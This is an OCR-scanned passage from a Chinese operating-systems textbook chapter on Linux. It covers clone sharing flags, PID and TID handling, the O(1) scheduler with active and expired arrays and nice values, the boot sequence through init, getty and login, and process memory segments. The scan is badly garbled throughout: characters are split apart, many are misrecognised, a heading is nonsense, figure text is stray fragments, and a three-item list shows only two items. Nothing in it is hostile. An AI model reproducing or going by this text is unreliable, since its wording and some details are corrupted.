CLONE_FILES 位 与 CLONE_FS 位 相似 。 如 果 该 位 置 1， 新 线程 与 
旧 线 程 共享 文件 描述 符 ， 所 以 一 个 线程 调用 lseek 函 数 对 另 一 个 线程 而 
言 是 可 见 的 。 通 常 ， 这 样 的 处 理 是 对 于 同属 一 个 进程 的 线程 ， 而 不 是 
不 同 进程 的 线程 。 相 似 的 ，CLONE_SIGHAND 位 控制 是 否 在 新 、 旧 线 
程 间 共享 信号 句柄 表 。 如 有 果 信 和 号 处 理 函 数 表 是 共享 的 ， 即 使 是 在 拥有 
不 同 地 址 空间 的 线程 之 间 共 享 ， 一 个 线程 改变 某 一 处 理 函 数 也 会 影响 
另 一 个 线程 的 处 理 函 数 。CLONE_PID 位 控制 新 线程 是 拥有 自己 的 PID 
还 是 与 父 进程 共享 PID。 这 个 特性 在 系统 局 动 的 时 候 是 必需 的 。 用 户 进 
程 不 允许 对 该 位 进行 设置 。 


最 后 ， 每 一 个 进程 都 有 一 个 父 进程 。CLONE_PARENT 位 控制 着 哪 
一 个 线程 是 新 线程 的 父 线程 。 父 线程 可 以 与 clone 函 数 调用 者 的 父 线程 
相同 (在 这 种 情况 下 ， 新 线程 是 clone 函 数 调 用 者 的 兄弟 ) ， 也 可 以 是 
clone 范 数 调 用 者 本 身 ， 在 这 种 情况 下 ， 新 线程 是 clone 函 数 调 用 者 的 子 
线程 。 还 有 另外 一 些 控 制 其 他 项 目的 位 ， 但 是 它们 不 是 很 重要 。 


由 于 Linux 系 统 为 不 同 的 项 目 维护 了 独立 的 数据 结构 〈 见 10.3.3 小 
五， 如 调度 参数 、 内 存 映 射 等 ) ， 因 此 细 粒 度 的 共享 成 为 了 可 能 。 任 


务 数 据 结构 只 需要 指向 这 些 数据 结构 即 可 ， 所 以 为 每 一 个 线程 创建 一 
个 新 的 任务 数据 结构 变 得 很 容易 ， 或 者 使 它 指向 旧 线 程 的 调度 参数 、 
内 存 映 映 和 其 他 的 数据 结构 ， 或 者 复制 它们 。 事 实 上 ， 条 理 分 明 的 共 
享 性 虽然 成 为 了 可 能 ， 但 并 不 意味 着 它 是 有 益 的， 毕竟 传统 的 UNIX 系 
统 都 没有 提供 这 样 的 功能 。 一 个 利用 了 这 种 共享 性 的 Linux 程 序 将 不 能 
移植 到 UNIX 系 统 


Linux 系 统 的 线程 模型 带 来 了 另 一 个 难题 。UNIX 系 统 为 每 一 个 进 
程 分 配 一 个 独立 的 PID， 不 论 它 是 单线 程 的 进程 还 是 多 线程 的 进程 。 为 
了 能 与 其 他 的 UNIX 系 统 兼容 ，Linux 对 进程 标识 符 (PID) 和 任务 标识 
符 (TID) 进行 了 区 分 。 这 两 个 分 量 都 存储 在 任务 数据 结构 中 。 当 调用 
clone 函 数 创建 一 个 新 进程 而 不 需要 和 有 旧 进程 共享 任何 信息 时 ，PID 被 设 
置 成 一 个 新 值 ; 否则 ， 任 务 得 到 一 个 新 的 任务 标识 符 ， 但 是 PID 不 变 。 
这 样 一 来 ， 一 个 进程 中 所 有 的 线程 都 会 拥有 与 该 进程 中 第 一 个 线程 相 
同 的 PID ° 


10.3.4 ”Linux 中 的 调度 


现在 我 们 来 关注 Linux 系 统 的 调度 算法 。 首 先 要 认识 到 ，Linux 系 统 
的 线程 是 内 核 线 程 ， 所 以 Linux 系 统 的 调度 是 基于 线程 的 ， 而 不 是 基于 
进程 的 。 


为 了 进行 调度 ，Linux 系 统 将 线程 区 分 为 三 类 : 
1) 实 时 先入 先 出 。 


2) 实 时 轮转 。 


实时 先入 先 出 线程 具有 最 高 优先 级 ， 它 不 会 被 其 他 线程 抢占 ， 除 
非 那 是 一 个 刚刚 准备 好 的 、 拥 有 更 高 优先 级 的 实时 先入 先 出 线程 。 实 
时 轮转 线程 与 实时 先入 先 出 线程 基本 相同 ， 只 古 每 个 实时 轮转 线程 都 
有 一 个 时 间 量 ， 时 间 到 了 之 后 就 可 以 被 抢占 。 如 来 多 个 实时 轮转 线程 
都 准备 好 了 ， 每 一 个 线程 运行 它 的 时 间 量 所 规定 的 时 间 ， 然 后 插入 到 
实时 轮转 线程 列表 的 末尾 。 事 实 上 ， 这 两 类 线程 都 不 是 真正 的 实时 线 
程 。 执 行 的 最 后 期 限 无 法 确定 ， 更 无 法 保证 最 后 期 限 前 线程 可 以 执行 
完毕 。 这 两 类 线程 比 起 分 时 线程 来 说 只 是 具有 更 高 的 优先 级 而 已 。 
Linux 系 统 之 所 以 称 它们 为 “实时 ”是 因为 Linux 系 统 遵循 的 P1003.4 标 准 


(UNIX 系 统 对 “实时 ?含义 的 扩展 ) 使 用 了 这 个 名 称 。 在 系统 内 部 ， 实 
时 线程 的 优先 级 从 0 到 99，0 是 实时 线程 的 最 高 优先 级 ，99 是 实时 线程 
的 最 低 优 先 级 。 


传统 的 非 实时 线程 按照 如 下 的 算法 进行 调度 。 在 系统 内 部 ， 非 实 
时 线程 的 优先 级 从 100 到 139， 也 就 是 说 ， 在 系统 内 部 ，Linux 系 统 区 分 
140 级 的 优先 级 〈 包 括 实 时 和 非 实 时 任务 ) 。 就 像 实 时 轮转 线程 一 样 ， 
Linux 系 统 根 据 非 实时 线程 的 优先 级 分 配 时 间 量 。 这 个 时 间 量 是 线程 可 
以 连续 运行 的 时 钟 周 期 数 。 在 当前 的 Linux 版 本 中 ， 时 钟 频率 为 1000 赫 
效 ， 每 个 时 钟 周期 为 Ims， 也 叫做 一 个 最 小 时 间 间 隔 (jiffy) 。 


像 大 多 数 UNIX 系 统一 样 ，Linux 系 统 给 每 个 线程 分 配 一 个 nice 值 
( 即 优先 级 调节 值 ) 。 默 认 值 是 0， 但 是 可 以 通过 调用 系统 调用 nice 
(value) 来 修改 ， 修 改 值 的 范围 从 -20 到 +19。 这 个 值 决定 了 线程 的 静 
态 优先 级 。 一 个 在 后 台大 量 计算 r 值 的 用 户 可 以 在 他 的 程序 里 调用 这 个 
统 调用 为 其 他 用 户 让 出 更 多 计算 资源 。 只 有 系统 管理 员 可 以 要 求 比 
普通 服务 更 好 的 服务 “意味 着 nice 函 数 参数 值 的 范围 从 -20 到 -1) 。 推 断 
这 条 规则 的 理由 作为 练习 留 给 读者 。 


SN 


A 


Linux 调 度 算法 使 用 一 个 重要 的 数据 结构 一 一 调度 队列 。 在 系统 
中 ， 一 个 CPU 有 一 个 调度 队列 ， 除 了 其 他 信息 ， 调 度 队 列 中 有 两 个 数 
组 ， 一 个 是 正在 活动 的 ， 一 个 是 过 期 失效 的 。 如 图 10-10 所 示 ， 这 两 个 
分 量 都 是 指向 数组 的 指针 ， 每 个 数组 都 包含 了 140 个 链表 头 ， 每 个 链表 


具有 不 同 的 优先 级 。 链 表 头 指向 给 定 优先 级 的 双 疝 进程 链表 。 调 度 的 
基本 操作 如 下 所 述 。 


每 个 CPU 上 的 调度 队列 


标 i 
CPU 
静态 优先 级 


a 
活动 (数组 ) 
过 期 (数组) 
[es 


优先 级 0 


优先 级 139 
优先 级 0 
数组 [1] 


优先 级 139 


Al 10-10 Linux 调度 队列 和 优先 级 数组 


调度 器 从 正在 活动 数组 中 选择 一 个 优先 级 最 高 的 任务 。 如 有 果 这 个 
任务 的 时 间 片 (时间 量 ) 过 期 失效 了 ， 就 把 它 移动 到 过 期 失效 数组 中 
(可 能 会 插入 到 优先 级 不 同 的 列表 中 ) 。 如 果 这 个 任务 阻塞 了 ， 比 如 
说 正在 等 待 O 事 件 ， 那 么 在 它 的 时 间 片 过 期 失效 之 前 ， 一 旦 所 等 待 的 


事件 发 生 ， 任 务 束 可 以 继续 运行 ， 它 将 被 放 回 到 之 前 正在 活动 的 数组 
中 ， 时 间 片 根据 它 所 请 耗 的 CPU 时 间 相 应 的 减少 。 一 旦 它 的 时 间 片 消 
耗 殖 尽 ， 它 也 会 被 放 到 过 期 失效 数组 中 。 当 正在 活动 数组 中 没有 其 他 
的 任务 了 ， 调 度 器 交换 指针 ， 使 得 正在 活动 数组 变 为 过 期 失效 数组 ， 
过 期 失效 数组 变 为 正在 活动 数组 。 这 种 方法 可 以 保证 低 优先 级 的 任务 
不 会 被 饿 死 (除非 实时 先入 先 出 线程 完全 占用 CPU， 但 是 这 种 情况 是 
会 余生 的 ) 


不 同 的 优 和 级 被 赋予 不 同 的 时 间 片 长 度 。Linux 系 统 会 赋予 高 优 移 
级 的 进程 较 长 的 时 间 片 。 例 如 ， 优 先 级 为 100 的 任务 可 以 得 到 800ms 的 
时 间 片 ， 而 优先 级 为 139 的 任务 只 能 得 到 5ms 的 时 间 片 。 


这 种 调度 模式 的 思想 是 为 了 使 进程 更 快 地 出 入 内 核 。 如 有 果 一 个 进 
程 试图 读 取 一 个 磁 强 文件 ， 在 调用 read 函 数 之 间 等 待 一 秒 钟 的 时 间 显 然 
会 极 大 地 降低 进程 的 效率 。 每 个 请 求 完成 之 后 让 进程 立即 运行 的 做 法 
会 好 得 多 ， 同 时 这 样 做 也 可 以 使 下 一 个 请 求 更 快 的 完成 。 相 似 地 ， 如 
果 一 个 进程 因为 等 待 键盘 输入 而 阻塞 ， 那 么 它 明 显 是 一 个 交互 进程 ， 
这 样 的 进程 只 要 准备 好 运行 后 就 应 当 被 赋予 较 高 的 优先 级 ， 从 而 你 证 
交互 进程 可 以 提供 较 好 的 服务 。 在 这 种 情况 下 ， 当 IO 密集 进程 和 交互 
进程 被 阻塞 之 后 ，CPU 密 集 进程 基本 上 可 以 得 到 所 有 被 留 下 的 服务 。 


由 于 Linux 系 统 (或 其 他 任何 操作 系统 ) 事先 不 知道 一 个 任务 究竟 
征 IO 密 集 的 ， 还 是 CPU 密集 的 ， 它 只 是 依赖 于 连续 保持 的 互动 局 发 模 


式 。 通 过 这 种 方式 ，Linux 系 统 区 分 静 仿 优先 级 和 动态 优先 级 。 线 程 的 
动态 优先 级 不 断 地 被 重 新 计算 ， 其 目的 在 于 : (1) 奖 励 互 动 进程 ，(2) 惩 
昼 占 用 CPU 的 进程 。 最 高 的 优先 级 奖励 是 -5， 是 从 调度 器 接收 的 与 更 高 
优 移 级 相对 应 的 较 低 优先 级 的 值 。 最 高 的 优先 级 惩 避 是 +5。 


说 得 更 详细 些 ， 调 度 器 给 每 一 个 任务 维护 一 个 名 为 sleep_avg 的 变 
量 。 每 当 任务 被 唤醒 时 ， 这 个 变量 会 增加 ; 当 任务 被 抢占 或 时 间 量 过 
期 时 ， 这 个 变量 会 相应 地 减少 。 减 少 的 值 用 来 动态 生成 优先 级 奖励 ， 
奖励 的 范围 从 -5 到 +5。 当 一 个 线程 从 正在 活动 数组 移动 到 过 期 失效 数 
组 中 时 ，Linux 系 统 的 调度 器 会 重新 计算 它 的 优先 级 。 


这 里 讲述 的 调度 算法 指 的 是 2.6 版 本 内 核 ， 最 初 引 入 这 个 调度 算法 
的 是 不 稳定 的 2.5 版 本 内 核 。 早 期 的 调度 算法 在 多 处 理 器 环境 中 所 表现 
的 性 能 十 分 低下 ， 并 且 当 任务 的 数量 大 量 增长 时 ， 不 能 很 好 地 进行 调 
度 。 由 于 上 面 描述 的 内 容 说 明了 通过 访问 正在 活动 数组 就 可 以 做 出 调 
度 决 定 ， 那 么 调度 可 以 在 一 个 固定 的 时 间 O (1) 内 完成 ， 而 与 系统 
进程 的 数量 无 关 。 


另外 ， 调 度 器 包含 了 对 于 多 处 理 右 和 多 核 乎 台 而 言 非常 有 益 的 特 
性 。 甫 和 完 ， 在 多 处 理事 平台 上 ， 运 行 队列 数据 结构 与 某 一 个 处 理 硕 相 
对 应 ， 调 度 器 尽量 进行 亲 和 调 度 ， 即 将 之 前 在 某 个 处 理 器 上 运行 过 的 
任务 再 次 调 入 该 处 理 硕 。 第 二 ， 为 了 更 好 地 插 述 或 修改 一 个 选 定 的 线 
程 对 亲 和 性 的 要 求 ， 有 一 组 系统 调用 可 供 调 用 。 最 后 ， 在 满足 符 定性 


能 和 亲 和 要 求 的 前 提 下 ， 调 度 器 实现 在 不 同 处 理 器 上 阶段 性 地 加 载 平 
衡 ， 从 而 保证 整个 系统 的 加 载 是 平衡 的 。 


调度 器 只 考虑 可 以 运行 的 任务 ， 这 些 任务 被 放 在 适当 的 调度 队列 
当中 。 不 可 运行 的 任务 和 正在 等 符 各 种 IO 操作 或 内 核 事 件 的 任务 被 放 
入 另 一 个 数据 结构 当中 ， 即 等 待 队列 。 每 一 种 任务 可 能 需要 等 竺 的 事 
件 对 应 了 一 个 等 竺 队列 。 等 竺 队列 的 头 包 舍 一 个 指 癌 任务 链表 的 指针 
及 一 枚 目 旋 锁 。 为 了 保证 等 待 队列 可 以 在 主 内 核 代 码 、 中 断 处 理 函 数 
或 其 他 异步 处 理 请 求 代码 中 进行 并 发 操作 ， 目 旋 锁 是 非 第 必要 的 。 


10.3.5 Jaa Linux AZ 


每 个 平台 的 细节 都 有 不 同 ， 但 是 整体 来 说 ， 下 面 的 步骤 代表 了 启 
动 的 过 程 。 当 计算 机 启动 时 ，BIOS 加 电 自 检 (POST) ， 并 对 硬件 进行 
仿 测 和 初始 化 ， 这 是 因为 操作 系统 的 启动 过 程 可 能 会 依赖 于 磁盘 访 
问 、 屏 人 莫 、 键 盘 等 。 接 下 来 ， 启 动 磁 盘 的 第 一 个 局 区 ， 即 主 引导 记录 
(MBR) ， 被 读 入 到 一 个 固定 的 内 存 区 域 并 且 执 行 。 这 个 分 区 中 含有 
一 个 很 小 的 程序 (只 有 512 字 节 ) ， 这 个 程序 从 启动 设备 中 ， 通 常 是 
IDE 或 SCSI 磁 盘 ， 调 入 一 个 名 为 boot 的 独立 程序 。boot 程 序 将 自身 复制 
到 高 地 址 的 内 存 当 中 从 而 为 操作 系统 释放 低地 址 的 内 存 。 


复制 完成 后 ，boot 程 序 读 取 局 动 设备 的 根 目 示 。 为 了 达到 这 个 目 
的 ，boot 程 序 必须 能 够 理解 文件 系统 和 目录 格式 ， 这 个 工作 通常 由 引导 
程序 ， 如 GRUB (多 系统 启动 管理 器 ， 来 完成 。 其 他 流行 的 引导 程 
序 ， 如 Intel 的 LILO， 不 依赖 于 任何 特定 的 文件 系统 。 相 反 ， 他 们 需要 
一 个 块 映射 图 和 低层 地 址 ， 他 们 描述 了 物理 户 区 、 磁 头 和 磁道 ， 可 以 
帮助 找到 相应 的 需要 被 加 载 的 悄 区 。 


然后 ，boot 程 序 读 入 操作 系统 内 核 ， 并 把 控制 交 给 内 核 。 从 这 里 开 
台 ，boot 程 序 完成 了 它 的 任务 ， 系 统 内 核 开始 运行 。 


内 核 的 开始 代码 是 用 汇编 语言 写成 的 ， 具 有 较 高 的 机 器 依赖 性 。 
主要 的 工作 包括 创建 内 核 堆栈 、 识 别 CPU 类 型 、 计 算 可 用 内 存 、 华 
中 断 、 局 用 内 存 管理 单元 ， 最 后 调用 C 语 言 写 成 的 main 画 数 开始 执行 操 
作 系 统 的 主要 部 分 。 


C 语 言 代码 也 有 相当 多 的 初始 化 工作 要 做 ， 但 是 这 些 工作 更 逻辑 化 
(而 不 是 物理 化 ) 。C 语 言 代码 开始 的 时 候 会 分 配 一 个 消息 缓冲 区 来 帮 
助 调试 启动 出 现 的 问题 。 随 着 初始 化 工作 的 进行 ， 信 息 被 写 入 消息 缓 
冲 区 ， 这 些 信息 与 当前 正在 发 生 的 事件 相关 ， 所 以 ， 如 有 果 出 现 局 动 失 
败 的 情况 ， 这 些 信息 可 以 通过 一 个 特殊 的 诊断 程序 调 出 来 。 我 们 可 以 
把 它 当 作 是 操作 系统 的 “飞行 信息 记录 器 ”( 即 空难 发 生 后 ， 侦 查 员 寻 
RAN RGF) 。 


接 下 来 ， 内 核 数据 结构 得 到 分 配 。 大 部 分 内 核 数据 结构 的 大 小 是 
固定 的 ， 但 是 一 少 部 分 ， 如 页 面 缓存 和 特殊 的 页 表 结 构 ， 依 赖 于 可 用 
内 存 的 大 小 。 


从 这 里 开始 ， 系 统 进 行 自动 配置 。 使 用 描述 何 种 设备 可 能 存在 配 
置 文件 ， 系 统 开 始 探测 哪些 设备 是 确实 存在 的 。 如 果 一 个 被 探测 的 设 
备 给 出 了 响应 ， 这 个 设备 就 会 被 加 入 到 已 连接 设备 表 中 。 如 果 它 没有 
响应 ， 就 假设 它 未 连接 或 直接 忽略 掉 它 。 不 同 于 传统 的 UNIX 版 本 ， 
Linux 系 统 的 设备 驱动 程序 不 需要 静态 链接 ， 它 们 可 以 被 动态 加 载 (就 
像 所 有 的 MS-DOS 和 Windows 版 本 一 样 ) 。 


关于 文 持 和 反对 动态 加 载 驱 动 程序 的 争论 非常 有 趣 ， 值 得 简要 地 
阐述 一 下 。 动 态 加 载 的 主要 论点 是 同 样 的 二 进 制 文件 可 以 分 发 给 具有 
不 同系 统 配 置 的 用 户 ， 这 个 二 进 制 文 件 可 以 自动 加 载 它 所 需要 的 驱动 
程序 ， 甚 至 可 以 通过 网 络 加 载 。 反 对 动态 加 载 的 主要 论点 是 安全 。 如 
果 你 正在 一 个 安全 的 环境 中 运行 计算 机 ， 比 如 说 银行 的 数据 库 系 统 或 
者 公司 的 网 络 服务 化 ， 你 肯定 不 希望 其 他 人 回 内 核 中 插入 随机 代码 。 
系统 管理 员 可 以 在 一 个 安全 的 机 器 上 保存 系统 的 源 文件 和 目标 文件 ， 
在 这 台 机 右上 完成 系统 的 编译 链接 ， 然 后 通过 局 域 网 把 内 核 的 二 进 制 
文件 分 发 给 其 他 的 机 器 。 如 采 驱 动 程序 不 能 被 动态 加 载 ， 这 就 月 止 了 
那些 知道 超级 用 户 密码 的 计算 机 使 用 者 或 其 他 人 向 系统 内 核 注入 恶意 
或 漏洞 代码 。 而 且 ， 在 大 的 站 点 中 ， 系 统 编译 链接 的 时 候 硬 件 配置 都 
征 已 知 的 。 需 要 重新 链接 系统 的 变化 非常 罕见 ， 即 使 是 在 系统 中 添加 
一 个 硬件 设备 也 不 是 问题 。 


一 旦 所 有 的 便 件 者 配置 好 了 ， 接 下 来 要 做 的 事情 束 是 细心 地 手动 
运行 进程 0， 建 立 它 的 扒 栈 ， 运 行 它 。 进 程 0 继续 进行 初始 化 ， 做 如 下 
的 工作 : 配置 实时 时 钟 ， 挂 载 根 文 件 系 统 ， 创 建 init 进 程 (进程 1) 和 页 
面 守护 进程 〈 进 程 2) 。 


init 进 程 检 测 它 的 标志 以 确定 它 应 该 为 单 用 户 还 是 多 用 户 服务 。 前 
一 种 情况 ， 它 调用 fork 函 数 创建 一 个 shell 进 程 ， 并 且 等 得 这 个 进程 结 
束 。 后 一 种 情况 ， 它 调用 fork 函 数 创建 一 个 运行 系统 初始 化 shell 脚 本 


( 即 /etc/rc) 的 进程 ， 这 个 进程 可 以 进行 文件 系统 一 致 性 检测 、 挂 载 附 
加 文件 系统 、 开 启 守 护 进程 等 。 然 后 这 个 进程 从 /etc/ttys 中 读 取 数 据 ， 
其 中 /etc/ttys 列 出 了 所 有 的 终端 和 它们 的 属性 。 对 于 每 一 个 启用 的 终 
端 ， 这 个 进程 调用 fork 函 数 创建 一 个 自身 的 副本 ， 进 行内 部 处 理 并 运行 
一 个 名 为 getty 的 程序 。 


getty 程 序 设置 行 速率 以 及 其 他 的 行 属性 (比如 ， 有 一 些 可 能 是 调 
制 解 调 器 ) ， 然 后 在 终端 的 屏幕 上 输出 : 


login: 


等 竺 用户 从 键盘 键入 用 户 名 。 当 有 人 坐 在 终端 前 ， 提 供 了 一 个 用 
名 后 ，getty 程 序 就 结束 了 ， 登 录 程 序 /bin/login 开 始 运 行 。login 程 序 
要 求 输入 密码 ， 给 密码 加 密 ， 并 与 保存 在 密码 文件 /etc/passwd 中 的 加 密 
密码 进行 对 比 。 如 果 是 正确 的 ，login 程 序 以 用 户 shell 程 序 替换 自身 ， 
等 待 第 一 个 命令 。 如 果 是 不 正确 的 ，login 程 序 要 求 输入 另 一 个 用 户 
这 种 机 制 如 图 10-11 所 示 ， 该 系统 具有 三 个 终端 。 
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图 10-11 用 于 启动 一 些 Linux 系 统 的 进程 顺序 


在 图 中 ，0 号 终端 上 运行 的 getty 程 序 仍 然 在 等 待 用 户 输入 。1 号 终 
端 上 ， 用 户 已 经 键入 了 登录 名 ， 所 以 getty 程 序 已 经 用 login 程 序 替 换 掉 
上 自身， 目前 正在 等 待 用 户 输入 密码 。2 号 终端 上 ， 用 户 已 经 成 功 登 录 ， 
shell 程 序 显示 提示 符 (%) 。 然 后 用 户 输 入 


cp f1 f2 
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入 了 cp 命令 而 是 cc 命令 ，C 语 言 编译 器 的 主 程序 就 会 被 户 动 ， 这 将 生成 
更 多 的 子 进 程 来 运行 不 同 的 编译 过 程 。 


10.4 Linux 中 的 内 存 管 理 


Linux 的 内 存 模型 简单 明了 ， 这 样 使 得 程序 可 移植 并 且 能 够 在 内 存 
管理 单元 大 不 相同 的 机 器 上 实现 Linux， 比 如 : 从 没有 内 存 管 理 单元 的 
机 器 (如 ， 原 始 的 IBM PC) 到 有 复杂 分 页 硬件 支持 的 机 器 。 这 一 块 设 
计 领 域 在 过 去 数 十 年 几乎 没有 发 生 改 变 。 下 面 要 介绍 该 模型 以 及 它 是 
如 何 实 现 的 。 


10.4.1 基本 概念 


每 个 Linux 进 程 都 有 一 个 地 址 空间 ， 人 逻辑 上 有 三 段 组 成 :代码 、 数 
据 和 堆栈 段 。 图 10-12a 中 的 进程 A 就 给 出 了 一 个 进程 空间 的 例子 。 代 码 
段 包 含 了 形成 程序 可 执行 代码 的 机 器 指令 。 它 是 由 编译 侣 和 汇编 器 把 
C、Cr++ 或 者 其 他 程序 源码 转换 成 机 器 代码 而 产生 的 。 通 党 ， 代 码 段 是 
只 读 的 。 由 于 难以 理解 和 调试 ， 自 修改 程序 早 在 大 约 1950 年 就 不 再 时 
兴 了 。 因 此 ， 代 码 段 既 不 增长 也 不 减少 ， 总 之 不 会 发 生 改 变 。 
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Al 10-12 a) 进 程 A 的 虚拟 地 址 空间 ; b) 物 理 内 存 ;， g 进 程 B 的 虚拟 地 
址 空间 


数据 段 包 含 了 所 有 程序 变量 、 字 符 串 、 数 字 和 其 他 数据 的 存储 。 
它 有 两 部 分 ， 初 始 化 数据 和 未 初始 化 数据 。 由 于 历史 的 原因 ， 后 者 就 
是 我 们 所 知道 的 BSS 〈 历 史上 称 作 符号 起 始 块 ) 。 数 据 段 的 初始 化 部 分 
包括 编译 器 第 量 和 那些 在 程序 启动 时 就 需要 一 个 初始 值 的 变量 。 所 有 
BSS 部 分 中 的 变量 在 加 载 后 被 初始 化 为 0。 


例如 ， 在 C 语 言 中 可 以 在 声明 一 个 字符 串 的 同时 初始 化 它 。 当 程序 
局 动 的 时 候 ， 字 符 串 要 拥有 其 初始 值 。 为 了 实现 这 种 构造 ， 编 译 器 在 
地 址 空间 给 字符 串 分 配 一 个 位 置 ， 同 时 保证 在 程序 启动 的 时 候 该 位 置 
包含 了 合适 的 字符 串 。 从 操作 系统 的 角度 来 看 ， 初 始 化 数据 跟 程 序 代 
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在 程序 启动 的 时 候 加 载 到 内 存 。 


未 初始 化 数据 的 存在 实际 上 仅仅 是 个 优化 。 如 采 一 个 全 局 变量 未 
显 式 地 初始 化 ， 那 么 C 语 言 的 语义 说 明 它 的 初始 值 是 0。 实 际 上 ， 大 部 
分 全 局 变量 并 没有 显 式 初 始 化， 因此 都 是 0。 这 些 可 以 简单 地 通过 设置 
可 执行 文件 的 一 个 段 来 实现 ， 其 大 小 刚好 等 于 数据 所 需 的 字 节 数 ， 同 
时 初始 化 包括 缺 省 值 为 零 的 所 有 量 。 


然而 ， 为 了 节省 可 执行 文件 的 空间 ， 并 没有 这 样 做 。 取 而 代 之 的 
征 ， 文 件 包含 所 有 显 式 初始 化 的 变量 ， 跟 随 在 程序 代码 之 后 。 那 些 未 
初始 化 的 变量 都 被 收集 在 初始 化 数据 之 后 ， 因 此 编译 万 要 做 的 束 生 在 
文件 头 部 放 入 一 个 字段 说 明 要 分 配 的 字 市 数 。 


为 了 清楚 地 说 明 这 一 点 ， 再 考虑 图 10-12a。 这 里 代码 段 的 大 小 古 
8KB， 和 初始化 数据 段 的 大 小 也 是 8KB。 未 初始 化 数据 (BSS) 是 4KB。 
可 执行 文件 仅 有 16KB 《代码 + 初始 化 数据 ) ， 加 上 一 个 很 短 的 头 部 来 
告诉 系统 在 初始 化 数据 后 另外 再 分 配 4KB， 同 时 在 程序 启动 之 前 把 它 
们 初始 化 为 0。 这 个 技巧 避免 了 在 可 执行 文件 中 存储 4KB 的 0 。 


为 了 避免 分 配 一 个 全 是 0 的 物理 页 框 ， 在 初始 化 的 时 候 ，Linux 吏 
分 配 了 一 个 静态 零 页 面 ， 即 一 个 全 0 的 写 保护 页 面 。 当 加 载 程序 的 时 
候 ， 未 初始 化 数据 区 域 被 设置 为 指 癌 该 零 页 面 。 当 一 个 进程 真正 要 写 


这 个 区 域 的 时 候 ， 写 时 复制 的 机 制 束 开始 起 作用 ， 一 个 实际 的 页 框 被 
分 配给 该 进程 。 


跟 代 码 段 不 一 样 ， 数 据 段 可 以 改变 。 程 序 总 是 修改 它 的 变量 。 而 
且 ， 许 多 程序 需要 在 执行 时 动态 分 配 空 间 。Linux 允 许 数据 段 随 着 内 存 
的 分 配 和 回收 而 增长 和 缩减 ， 通 过 这 种 机 制 来 解决 动态 分 配 的 问题 。 
有 一 个 系统 调用 brk， 人 允许 程序 设置 其 数据 段 的 大 小 。 那 么 ， 为 了 分 配 
更 多 的 内 存 ， 一 个 程序 可 以 增加 数据 段 的 大 小 。C 库 函数 malloc 通 常 被 
用 来 分 配 内 存 ， 它 驶 大 量 使 用 这 个 系统 调用 。 进 程 地 址 空间 摘 述 符 包 
含 信息 进程 动态 分 配 的 内 存 区 域 (通常 叫做 堆 ，heap) 的 范围 。 


第 三 段 是 栈 段 。 在 大 多 数 机 器 里 ， 它 从 虚拟 地 址 空间 的 顶部 或 者 
附近 开始 ， 并 且 向 下 生长 。 例 如 ， 在 32 位 x86 平 台 上 ， 栈 的 起 始 地 址 是 
0xC0000000， 这 是 在 用 户 态 下 对 进程 可 见 的 3GB 虚 拟 地 址 限制 。 如 果 
栈 生长 到 了 栈 段 的 底部 以 下 ， 就 会 产 出 一 个 硬件 错误 同时 操作 系统 把 
栈 段 的 底部 降低 一 个 页 面 。 程 序 并 不 显 式 地 控制 栈 段 的 大 小 。 


当 一 个 程序 启动 的 时 候 ， 它 的 栈 并 不 是 空 的 。 相 反 ， 它 包含 了 所 
有 的 环境 变量 以 及 为 了 调用 它 而 向 shell 输 入 的 命令 行 。 这 样 ， 一 个 各 
序 就 可 以 发 现 它 的 参数 了 。 比 如 ， 当 输入 以 下 命令 


cp src dest 


时 ，cp 程 序 运 行 ， 并 且 栈 上 有 字符 串 “cp src dest”"， 这 样 程序 就 可 
以 找到 源 文件 和 目标 文件 的 名 字 。 这 些 字 符 串 被 表示 为 一 个 指针 数组 
来 指 回 字符 串 中 的 符号 ， 使 得 解析 更 加 容易 。 


当 两 个 用 户 运 行 同 样 的 程序 ， 比 如 编辑 器 ， 可 以 在 内 存 中 立刻 保 
持 该 编辑 器 程序 代码 的 两 个 副本 ， 但 是 并 不 高 效 。 相 反 地 ， 大 多 数 
Linux 系 统 支 持 共 享 代码 段 。 在 图 10-12a 和 图 10-12c 中 ， 可 以 看 到 两 个 
进程 A 和 B 拥 有 相同 的 代码 段 。 在 图 10-12b 中 可 以 看 到 物理 内 存 的 一 种 
可 能 布局 ， 其 中 两 个 进程 共享 了 同样 的 代码 片段 。 这 种 映射 是 通过 虚 
拟 内 存 硬 件 来 实现 的 。 


数据 段 和 栈 段 从 来 不 共享 ， 除 非 是 在 一 个 fork 之 后 ， 并 且 仅 仅 是 那 
些 没有 被 修改 的 页 面 。 如 果 二 者 之 一 要 增长 但 是 没有 邻近 的 空间 来 增 
长 ， 这 并 不 会 产生 问题 ， 因 为 在 虚拟 地 址 空间 中 邻近 的 页 面 并 不 一 
要 映射 到 邻近 的 物理 页 面 上 。 


在 有 些 计算 机 上 ， 硬 件 支 持 指 令 和 数据 拥有 不 同 的 地 址 空间 。 如 
果 有 这 个 特性 ，Linux 束 可 以 利用 它 。 例 如 ， 在 一 个 32 位 地 址 的 计算 机 
上 如 果 有 这 个 特性 ， 那 么 就 有 2” 字 节 的 指令 地 址 空间 和 2 字 节 的 数 
据 地 址 空间 。 一 个 到 0 的 跳 转 指 令 跳 入 到 代码 段 的 地 址 9， 而 一 个 从 0 的 
移动 使 用 数据 空间 的 地 址 0。 这 使 得 可 用 的 数据 空间 加 倍 。 


除了 动态 分 配 更 多 的 内 存 ，Linux 中 的 进程 可 以 通过 内 存 映 射 文件 
来 访问 文件 数据 。 这 个 特性 使 我 们 可 以 把 一 个 文件 映射 到 进程 空间 的 
一 部 分 而 该 文件 就 可 以 像 位 于 内 存 中 的 字 市 数组 一 样 被 读 写 。 把 一 个 
文件 映射 进来 使 得 随机 读 写 比 使 用 read 和 write 之 类 的 IO 系统 调用 要 容易 
的 多 。 共 享 库 的 访问 驶 是 用 这 种 机 制 映 射 进来 后 进行 的 。 在 图 10-13 
中 ， 我 们 可 以 看 到 一 个 文件 被 同时 映射 到 两 个 进程 中 ， 但 在 不 同 的 虚 
拟 地 址 上 。 
进程 A 
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Al 10-13 两 个 进程 可 以 共享 一 个 映射 文件 


10.4.2 Linux 中 的 内 存 管理 系统 调用 


POSIX 没 有 给 内 存 管理 指定 任何 系统 调用 。 这 个 主题 个 认为 古 太 
依赖 于 机 融 而 不 便于 标准 化 。 可 征 ， 这 个 问题 通过 这 样 的 说 法 被 隐藏 
ERT: 那些 需要 动态 内 存 管 理 的 程序 可 以 使 用 malloc 库 函数 (由 
ANSIC 标 准 定义 ) 。 那 么 malloc 和 是 如 何 实现 的 殉 和 被 推 到 了 POSIX 标 准 之 
